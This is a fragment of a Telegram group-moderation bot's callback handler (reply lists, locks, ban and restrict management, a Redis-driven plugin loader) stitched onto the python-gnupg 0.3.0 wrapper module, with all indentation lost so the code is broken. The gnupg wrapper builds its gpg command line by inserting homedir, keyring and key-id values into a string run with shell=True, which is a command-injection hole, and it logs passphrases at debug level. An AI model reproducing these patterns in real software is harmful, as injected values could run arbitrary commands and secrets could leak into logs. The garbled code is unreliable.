Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos":
redis.delete("{}Nbot:sudos".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
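# --- Plugin sketch (not part of the original bot) ---
# The loop above pulls every name stored in the "{BOT_ID}Nbot:botfiles" Redis
# set, imports it from the files/ directory as files.<name>, and runs its
# updateCb(client, callback_query, redis) in a daemon thread. A plugin saved
# as, e.g., files/example.py (hypothetical name) only needs to expose that
# callable, roughly like this:
#
#     def updateCb(client, callback_query, redis):
#         # react only to the payloads this plugin cares about
#         if callback_query.data == "example":
#             redis.incr("example:clicks")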
|
gnupg.py
|
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, [email protected]
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2012 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
__version__ = "0.3.0"
__author__ = "Vinay Sajip"
__date__ = "$12-May-2012 10:49:10$"
try:
from io import StringIO
except ImportError:
from cStringIO import StringIO
import codecs
import locale
import logging
import os
import socket
from subprocess import Popen
from subprocess import PIPE
import sys
import threading
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def handle(self, record):
pass
try:
unicode
_py3k = False
except NameError:
_py3k = True
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
if hasattr(sys.stdin, 'encoding'):
enc = sys.stdin.encoding
else:
enc = 'ascii'
while True:
data = instream.read(1024)
if len(data) == 0:
break
sent += len(data)
logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except UnicodeError:
outstream.write(data.encode(enc))
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
try:
outstream.close()
except IOError:
logger.warning('Exception occurred while closing: ignored', exc_info=1)
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase, encoding):
passphrase = '%s\n' % passphrase
passphrase = passphrase.encode(encoding)
stream.write(passphrase)
logger.debug("Wrote passphrase: %r", passphrase)
def _is_sequence(instance):
return isinstance(instance,list) or isinstance(instance,tuple)
def _make_binary_stream(s, encoding):
try:
if _py3k:
if isinstance(s, str):
s = s.encode(encoding)
else:
if type(s) is not str:
s = s.encode(encoding)
from io import BytesIO
rv = BytesIO(s)
except ImportError:
rv = StringIO(s)
return rv
class Verify(object):
"Handle status messages for --verify"
def __init__(self, gpg):
self.gpg = gpg
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("TRUST_UNDEFINED", "TRUST_NEVER", "TRUST_MARGINAL",
"TRUST_FULLY", "TRUST_ULTIMATE", "RSA_OR_IDEA", "NODATA",
"IMPORT_RES", "PLAINTEXT", "PLAINTEXT_LENGTH",
"POLICY_URL", "DECRYPTION_INFO", "DECRYPTION_OKAY"):
pass
elif key == "BADSIG":
self.valid = False
self.status = 'signature bad'
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.status = 'signature good'
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
# may be different if signature is made with a subkey
self.pubkey_fingerprint = value.split()[-1]
self.status = 'signature valid'
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
elif key == "ERRSIG":
self.valid = False
(self.key_id,
algo, hash_algo,
cls,
self.timestamp) = value.split()[:5]
self.status = 'signature error'
elif key == "DECRYPTION_FAILED":
self.valid = False
self.key_id = value
self.status = 'decryption failed'
elif key == "NO_PUBKEY":
self.valid = False
self.key_id = value
self.status = 'no public key'
elif key in ("KEYEXPIRED", "SIGEXPIRED"):
# these are useless in verify, since they are spit out for any
# pub/subkeys on the key, not just the one doing the signing.
# if we want to check for signatures with expired key,
# the relevant flag is EXPKEYSIG.
pass
elif key in ("EXPKEYSIG", "REVKEYSIG"):
# signed with expired or revoked key
self.valid = False
self.key_id = value.split()[0]
self.status = (('%s %s') % (key[:3], key[3:])).lower()
else:
raise ValueError("Unknown status message: %r" % key)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self, gpg):
self.gpg = gpg
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key == "IMPORTED":
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM":
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
elif key == "KEYEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Key expired'})
elif key == "SIGEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Signature expired'})
else:
raise ValueError("Unknown status message: %r" % key)
def summary(self):
l = []
l.append('%d imported'%self.imported)
if self.not_imported:
l.append('%d not imported'%self.not_imported)
return ', '.join(l)
class ListKeys(list):
''' Handle status messages for --list-keys.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
def __init__(self, gpg):
self.gpg = gpg
self.curkey = None
self.fingerprints = []
self.uids = []
def key(self, args):
vars = ("""
type trust length algo keyid date expires dummy ownertrust uid
""").split()
self.curkey = {}
for i in range(len(vars)):
self.curkey[vars[i]] = args[i]
self.curkey['uids'] = []
if self.curkey['uid']:
self.curkey['uids'].append(self.curkey['uid'])
del self.curkey['uid']
self.curkey['subkeys'] = []
self.append(self.curkey)
pub = sec = key
def fpr(self, args):
self.curkey['fingerprint'] = args[9]
self.fingerprints.append(args[9])
def uid(self, args):
self.curkey['uids'].append(args[9])
self.uids.append(args[9])
def sub(self, args):
subkey = [args[4], args[11]]
self.curkey['subkeys'].append(subkey)
def handle_status(self, key, value):
pass
class Crypt(Verify):
"Handle status messages for --encrypt and --decrypt"
def __init__(self, gpg):
Verify.__init__(self, gpg)
self.data = ''
self.ok = False
self.status = ''
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("ENC_TO", "USERID_HINT", "GOODMDC", "END_DECRYPTION",
"BEGIN_SIGNING", "NO_SECKEY", "ERROR", "NODATA",
"CARDCTRL"):
# in the case of ERROR, this is because a more specific error
# message will have come first
pass
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"MISSING_PASSPHRASE", "DECRYPTION_FAILED",
"KEY_NOT_CREATED"):
self.status = key.replace("_", " ").lower()
elif key == "NEED_PASSPHRASE_SYM":
self.status = 'need symmetric passphrase'
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP":
self.status = 'invalid recipient'
elif key == "KEYEXPIRED":
self.status = 'key expired'
elif key == "SIG_CREATED":
self.status = 'sig created'
elif key == "SIGEXPIRED":
self.status = 'sig expired'
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("PROGRESS", "GOOD_PASSPHRASE", "NODATA"):
pass
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self, gpg):
self.gpg = gpg
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambiguous specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM":
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else:
raise ValueError("Unknown status message: %r" % key)
class Sign(object):
"Handle status messages for --sign"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
return self.fingerprint is not None
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("USERID_HINT", "NEED_PASSPHRASE", "BAD_PASSPHRASE",
"GOOD_PASSPHRASE", "BEGIN_SIGNING", "CARDCTRL"):
pass
elif key == "SIG_CREATED":
(self.type,
algo, hashalgo, cls,
self.timestamp, self.fingerprint
) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class GPG(object):
decode_errors = 'strict'
result_map = {
'crypt': Crypt,
'delete': DeleteResult,
'generate': GenKey,
'import': ImportResult,
'list': ListKeys,
'sign': Sign,
'verify': Verify,
}
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False,
use_agent=False, keyring=None):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
keyring -- name of alternative keyring file to use. If specified,
the default keyring is not used.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
self.keyring = keyring
self.verbose = verbose
self.use_agent = use_agent
self.encoding = locale.getpreferredencoding()
if self.encoding is None: # This happens on Jython!
self.encoding = sys.stdin.encoding
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
p = self._open_subprocess(["--version"])
result = self.result_map['verify'](self) # any result will do for this
self._collect_output(p, result, stdin=p.stdin)
if p.returncode != 0:
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
cmd = [self.gpgbinary, '--status-fd 2 --no-tty']
if self.gnupghome:
cmd.append('--homedir "%s" ' % self.gnupghome)
if self.keyring:
cmd.append('--no-default-keyring --keyring "%s" ' % self.keyring)
if passphrase:
cmd.append('--batch --passphrase-fd 0')
if self.use_agent:
cmd.append('--use-agent')
cmd.extend(args)
cmd = ' '.join(cmd)
if self.verbose:
print(cmd)
logger.debug("%s", cmd)
return Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def _read_response(self, stream, result):
# Internal method: reads all the stderr output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
if len(line) == 0:
break
lines.append(line)
line = line.rstrip()
if self.verbose:
print(line)
logger.debug("%s", line)
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if len(data) == 0:
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
if _py3k:
# Join using b'' or '', as appropriate
result.data = type(data)().join(chunks)
else:
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None, stdin=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning. If a stdin stream is given,
close it before returning.
"""
stderr = codecs.getreader(self.encoding)(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = process.stdout
dr = threading.Thread(target=self._read_data, args=(stdout, result))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
if stdin is not None:
try:
stdin.close()
except IOError:
pass
stderr.close()
stdout.close()
def _handle_io(self, args, file, result, passphrase=None, binary=False):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not binary:
stdin = codecs.getwriter(self.encoding)(p.stdin)
else:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
self._collect_output(p, result, writer, stdin)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
f = _make_binary_stream(message, self.encoding)
result = self.sign_file(f, **kwargs)
f.close()
return result
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True,
detach=False, binary=False):
"""sign file"""
logger.debug("sign_file: %s", file)
if binary:
args = ['-s']
else:
args = ['-sa']
# You can't specify detach-sign and clearsign together: gpg ignores
# the detach-sign in that case.
if detach:
args.append("--detach-sign")
elif clearsign:
args.append("--clearsign")
if keyid:
args.append('--default-key "%s"' % keyid)
result = self.result_map['sign'](self)
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
except IOError:
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer, stdin)
return result
